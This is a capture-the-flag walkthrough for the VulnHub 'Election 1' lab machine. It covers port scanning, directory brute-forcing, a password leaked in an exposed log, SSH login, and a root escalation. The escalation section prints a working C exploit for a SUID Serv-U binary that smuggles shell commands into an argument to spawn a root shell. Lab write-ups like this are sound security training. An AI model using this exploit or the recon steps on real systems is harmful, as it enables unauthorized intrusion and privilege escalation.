Election 1

Walkthrough of the Election 1 machine from Vulnhub

Election 1

Link to VulnHub

Obtaining the target machine's IP address

The first thing we are going to do is try to find out what is the target machine IP address. To do this we will use nmap specifying that we want to do a ping scan (-sn) for the entire network we are currently in. If we are not as a root user it is recommended to use sudo to obtain additional information of the computers that are on the network:

sudo nmap -sn 10.0.0.1/24

Relevant result:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-25 11:18 CET ... Nmap scan report for 10.0.0.102 Host is up (0.00085s latency). MAC Address: 08:00:27:63:A4:A0 (Oracle VirtualBox virtual NIC) ...

Nmap indicates that the IP of the target machine is the following:

  • 10.0.0.102

In case it is a virtual machine we can verify this by checking if the MAC addresses of the network cards match.

The next thing we are going to do is to add the IP of the target machine to our /etc/hosts. This way we won't need to remember the IP and we can use whatever name we give it. We edit the /etc/hosts file and add the following line at the end of it:

10.0.0.102 election1.ctf

Now if we run ping election1.ctf -c 1 we should get the following response:

PING election1.ctf (10.0.0.102) 56(84) bytes of data. 64 bytes from election1.ctf (10.0.0.102): icmp_seq=1 ttl=64 time=0.909 ms --- election1.ctf ping statistics --- 1 packets transmitted, 1 received, 0% packet loss, time 0ms rtt min/avg/max/mdev = 0.909/0.909/0.909/0.000 ms

This confirms that it correctly resolves the hostname we have assigned to it.

Port scanning

Once we have the IP of the target machine, what we are going to do is try to detect the opened ports. To do this we will launch another scan with nmap against the entire port range (-p-) using the fastest timing template (-T5), filtering by the open ports (--open), and disabling DNS resolution (-n) and host discovery (-Pn):

nmap -p- -T5 --open -Pn -n election1.ctf

Result:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-10 10:42 CEST Nmap scan report for election1.ctf (10.0.0.102) Host is up (0.00013s latency). Not shown: 65533 closed tcp ports (conn-refused) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http Nmap done: 1 IP address (1 host up) scanned in 0.97 seconds

From this scan we obtain that the following ports are open: 22 (SSH) and 80 (HTTP). Knowing that these ports are open, the next thing we are going to do is to try to detect which services are being exposed and their versions (-sCV):

nmap -p 22,80 -sCV election1.ctf

Result:

Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-10 10:43 CEST Nmap scan report for election1.ctf (10.0.0.102) Host is up (0.00042s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 20d1ed84cc68a5a786f0dab8923fd967 (RSA) | 256 7889b3a2751276922af98d27c108a7b9 (ECDSA) |_ 256 b8f4d661cf1690c5071899b07c70fdc0 (ED25519) 80/tcp open http Apache httpd 2.4.29 ((Ubuntu)) |_http-server-header: Apache/2.4.29 (Ubuntu) |_http-title: Apache2 Ubuntu Default Page: It works Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds

From the result of the more detailed scan we obtain the following:

  • 22/tcp: SSH - OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
  • 80/tcp: HTTP - Apache httpd 2.4.29 ((Ubuntu))

HTTP service analysis (80/TCP)

Since we have an HTTP service exposed on port 80, what we are going to do is try to see what is being exposed on that port by accessing the url http://election1.ctf in the browser.

When accessing we see the default Apache page, which confirms what nmap had already indicated. As in http://election1.ctf we do not find anything interesting, we are going to make a brute force attack to discover more paths and files.

To perform this attack we will use Gobuster indicating that we want to list directories (dir) against the IP of the target machine (-u), using additional extensions (-x), using a directory listing oriented dictionary (-w), and limiting the number of threads to 3 (-t):

gobuster dir -u http://election1.ctf -x html,txt,php -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 3

Result:

=============================================================== Gobuster v3.1.0 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://election1.ctf [+] Method: GET [+] Threads: 3 [+] Wordlist: /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.1.0 [+] Extensions: html,txt,php [+] Timeout: 10s =============================================================== 2023/04/10 10:50:20 Starting gobuster in directory enumeration mode =============================================================== /index.html (Status: 200) [Size: 10918] /javascript (Status: 301) [Size: 319] [--> http://election1.ctf/javascript/] /robots.txt (Status: 200) [Size: 30] /election (Status: 301) [Size: 317] [--> http://election1.ctf/election/] /phpmyadmin (Status: 301) [Size: 319] [--> http://election1.ctf/phpmyadmin/] /phpinfo.php (Status: 200) [Size: 95409] /server-status (Status: 403) [Size: 278] =============================================================== 2023/04/10 10:51:32 Finished ===============================================================

From the scan we obtain that there are several paths that may be of interest:

  • /javascript: which redirects us to /javascript/, where we have no access. There could be more resources inside this directory.
  • /robots.txt: which can give us information about more existing resources.
  • /election: which redirects us to /election/, which is a page we can analyze.
  • /phpmyadmin: which redirects us to /phpmyadmin/, which is an authentication portal.
  • /phpinfo.php: which contains information about the Apache server
  • /server-status: which we don't have access to

/election/ analysis

As we have seen above, we have a page at http://election1.ctf/election/. Let's see if we are able to list more resources inside using dirb. To do this we run:

dirb http://election1.ctf/election/

Relevant result:

----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Mon Apr 10 11:07:07 2023 URL_BASE: http://election1.ctf/election/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://election1.ctf/election/ ---- ==> DIRECTORY: http://election1.ctf/election/admin/ ==> DIRECTORY: http://election1.ctf/election/data/ + http://election1.ctf/election/index.php (CODE:200|SIZE:7003) ==> DIRECTORY: http://election1.ctf/election/js/ ==> DIRECTORY: http://election1.ctf/election/languages/ ==> DIRECTORY: http://election1.ctf/election/lib/ ==> DIRECTORY: http://election1.ctf/election/media/ ==> DIRECTORY: http://election1.ctf/election/themes/ ---- Entering directory: http://election1.ctf/election/admin/ ---- ==> DIRECTORY: http://election1.ctf/election/admin/ajax/ ==> DIRECTORY: http://election1.ctf/election/admin/components/ ==> DIRECTORY: http://election1.ctf/election/admin/css/ ==> DIRECTORY: http://election1.ctf/election/admin/img/ ==> DIRECTORY: http://election1.ctf/election/admin/inc/ + http://election1.ctf/election/admin/index.php (CODE:200|SIZE:8964) ==> DIRECTORY: http://election1.ctf/election/admin/js/ ==> DIRECTORY: http://election1.ctf/election/admin/logs/ ==> DIRECTORY: http://election1.ctf/election/admin/plugins/ ...

Within all the resources that it has detected, we find the directory /election/admin/logs/, in which we have directory listing capability. Inside that directory we find the file system.log, which, if we download it, we see that it has the following content:

[2020-01-01 00:00:00] Assigned Password for the user love: P@$$w0rd@123 [2020-04-03 00:13:53] Love added candidate 'Love'. [2020-04-08 19:26:34] Love has been logged in from Unknown IP on Firefox (Linux).

From here we obtain a username and password, which we can test in the different login methods of the target machine:

  • love: P@$$w0rd@123

Gaining access to the target machine

If we test the credentials obtained above, we can verify that they are valid to connect to the target machine via SSH:

ssh love@election1.ctf love@election1.ctf's password: P@$$w0rd@123

Result:

Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 5.3.0-46-generic x86_64) * Documentation: https://help.ubuntu.com * Management: https://landscape.canonical.com * Support: https://ubuntu.com/advantage * Strictly confined Kubernetes makes edge and IoT secure. Learn how MicroK8s just raised the bar for easy, resilient and secure K8s cluster deployment. https://ubuntu.com/engage/secure-kubernetes-at-the-edge * Canonical Livepatch is available for installation. - Reduce system reboots and improve kernel security. Activate at: https://ubuntu.com/livepatch 74 packages can be updated. 28 updates are security updates. New release '20.04.6 LTS' available. Run 'do-release-upgrade' to upgrade to it. Your Hardware Enablement Stack (HWE) is supported until April 2023. Last login: Thu Apr 9 23:19:28 2020 from 192.168.1.5

As we have seen, with this we have already gained access to the target machine.

If we investigate the home of the user love (/home/love) it does not take long to find the first flag (/home/love/Desktop/user.txt): cd38ac698c0d793a5236d01003f692b0.

Privilege escalation

If we check if we have sudoer permissions with sudo -l we see that we don't have any, so let's try to look for executables with SUID privileges. To find them we use the find command:

find / -perm -4000 2>/dev/null

Relevant result:

/usr/bin/arping /usr/bin/passwd /usr/bin/pkexec /usr/bin/traceroute6.iputils /usr/bin/newgrp /usr/bin/chsh /usr/bin/chfn /usr/bin/gpasswd /usr/bin/sudo /usr/sbin/pppd /usr/local/Serv-U/Serv-U /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/eject/dmcrypt-get-device ...

Ignoring that among the binaries is the pkexec binary, which we know can be used to escalate privileges using PwnKit, we see that there is another interesting binary called Serv-U. If we look up what it is we find that it is an FTP server. If we check if it has any vulnerability we find that there is one that allows privilege escalation (Exploit Database - exploit - 47009).

To execute the exploit we copy the exploit code into exploit.c:

#include <stdio.h> #include <unistd.h> #include <errno.h> int main() { char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL}; int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args); // if execv is successful, we won't reach here printf("ret val: %d errno: %d\n", ret_val, errno); return errno; }

We compile it with gcc and execute it:

gcc exploit.c -o exploit ./exploit

Result:

uid=0(root) gid=0(root) groups=0(root),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),116(lpadmin),126(sambashare),1000(love) opening root shell #

As we can see we already have access as the root user.

Once we have gained access as root we can see the second flag (/root/root.txt): 5238feefc4ffe09645d97e9ee49bc3a6.